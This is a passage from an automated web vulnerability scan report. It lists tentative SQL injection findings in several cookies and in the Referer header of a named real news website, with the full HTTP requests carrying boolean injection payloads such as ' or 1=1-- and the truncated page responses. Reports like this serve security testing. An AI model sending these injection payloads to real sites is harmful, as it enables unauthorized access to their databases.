document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginter
...[SNIP]...

1.134. http://www.contracostatimes.com/ci_16774009 [UserType cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16774009

Issue detail

The UserType cookie appears to be vulnerable to SQL injection attacks. The payloads 40344553'%20or%201%3d1--%20 and 40344553'%20or%201%3d2--%20 were each submitted in the UserType cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16774009?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser40344553'%20or%201%3d1--%20; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:49:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:49:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:49:19 GMT
Set-Cookie: JSESSIONID=NS005IFELOM2GCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 63148

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='City leaders could reappoint official, who lost election, to fill
soon-to-be vacant seat'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Pleasant Hill council must grapple soon with filling seat - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractiv
...[SNIP]...

Request 2

GET /ci_16774009?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser40344553'%20or%201%3d2--%20; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:49:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:49:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=NMULBYIBRRB1KCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 63148

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='City leaders could reappoint official, who lost election, to fill
soon-to-be vacant seat'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Pleasant Hill council must grapple soon with filling seat - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https
...[SNIP]...

1.135. http://www.contracostatimes.com/ci_16790597 [EMETA_COOKIE_CHECK_MNGI cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16790597

Issue detail

The EMETA_COOKIE_CHECK_MNGI cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the EMETA_COOKIE_CHECK_MNGI cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16790597?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1%20and%201%3d1--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:50:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:50:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:50:23 GMT
Set-Cookie: JSESSIONID=BRKODQ0IV0H2WCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 65063

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='OK. I admit it. I enjoy reading other people&#27;s mail as much as the next guy, so going through the WikiLeaks cables has made for some fascinating reading.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Thomas Friedman: WikiLeaks confirms that America is leaking leverage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/
...[SNIP]...

Request 2

GET /ci_16790597?source=most_emailed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1%20and%201%3d2--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:50:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:50:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=IYWUEKQC00XJOCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 65063

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='OK. I admit it. I enjoy reading other people&#27;s mail as much as the next guy, so going through the WikiLeaks cables has made for some fascinating reading.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Thomas Friedman: WikiLeaks confirms that America is leaking leverage - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/
...[SNIP]...

1.136. http://www.contracostatimes.com/ci_16790963 [fPage cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16790963

Issue detail

The fPage cookie appears to be vulnerable to SQL injection attacks. The payloads 12191704'%20or%201%3d1--%20 and 12191704'%20or%201%3d2--%20 were each submitted in the fPage cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16790963?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true12191704'%20or%201%3d1--%20; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:48:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:48:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:48:56 GMT
Set-Cookie: JSESSIONID=R1ZWT2OVQZ3YSCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 61327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/Er
...[SNIP]...

Request 2

GET /ci_16790963?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true12191704'%20or%201%3d2--%20; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:48:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:48:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=LXC0MP2SC3AUMCUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 61327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatime
...[SNIP]...

1.137. http://www.contracostatimes.com/ci_16790963 [s_sq cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16790963

Issue detail

The s_sq cookie appears to be vulnerable to SQL injection attacks. The payloads 43929352'%20or%201%3d1--%20 and 43929352'%20or%201%3d2--%20 were each submitted in the s_sq cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ci_16790963?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D43929352'%20or%201%3d1--%20; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:48:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:48:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: EMETA_NCLICK_MNGI=3; path=/; expires=Thursday, 09-Dec-2010 01:48:22 GMT
Set-Cookie: JSESSIONID=QT32PNOLQWOWACUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 61327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/Er
...[SNIP]...

Request 2

GET /ci_16790963?source=most_viewed HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D43929352'%20or%201%3d2--%20; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 01:48:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:48:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=OK40RG3ZKVTH0CUUCBWCFFI; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 61327

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" />
<meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />

<META name="y_key" content="05f2f4daeedbbc05" />
<script language="JavaScript">
document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/contra/favicon.ico" type="image/x-icon">');
</script>

<meta name="verify-v1" content="5tjAz4i10RSTLPe7KO1DheJAj1gF3Exe2k8P/btAy38=" />

<script src="http://extras.mnginteractive.com/live/js/Brightcove/ContraCosta/MobileCompatibility.js"></script>

<Script language="JavaScript">
   var CM8Server = "q1.checkm8.com";
   var CM8Cat = "contracostatimes.Home";
   var CM8Profile="";
   
   </script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript">
               MNGiRegistrationLoginStatus = "out";
               MNGiRegistrationUserName = "";
               MNGiRegistrationEmail = "";
           </script><!-- end get profile info --><script language="JavaScript" type="text/javascript">
   MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn";
   MNGiRegistrationUrl = "https://secure.www.contracostatime
...[SNIP]...

1.138. http://www.contracostatimes.com/ci_16791142 [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.contracostatimes.com
Path:   /ci_16791142

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

